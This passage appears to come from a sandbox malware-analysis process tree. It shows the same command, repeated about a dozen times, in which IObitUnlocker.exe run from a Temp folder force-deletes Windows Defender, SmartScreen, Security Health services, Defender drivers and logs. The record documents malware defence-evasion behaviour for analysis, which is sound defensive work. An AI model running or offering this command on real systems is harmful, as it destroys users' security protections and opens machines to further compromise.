                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                      10⤵
                                                                                                                        PID:4028
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                        10⤵
                                                                                                                          PID:5284
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                          10⤵
                                                                                                                            PID:1244
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                            10⤵
                                                                                                                              PID:1140
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                              10⤵
                                                                                                                                PID:3184
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                10⤵
                                                                                                                                  PID:5536
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                  10⤵
                                                                                                                                    PID:1660
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                    10⤵
                                                                                                                                      PID:5740
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                      10⤵
                                                                                                                                        PID:4700
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                        10⤵
                                                                                                                                          PID:5736
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                          10⤵
                                                                                                                                            PID:860
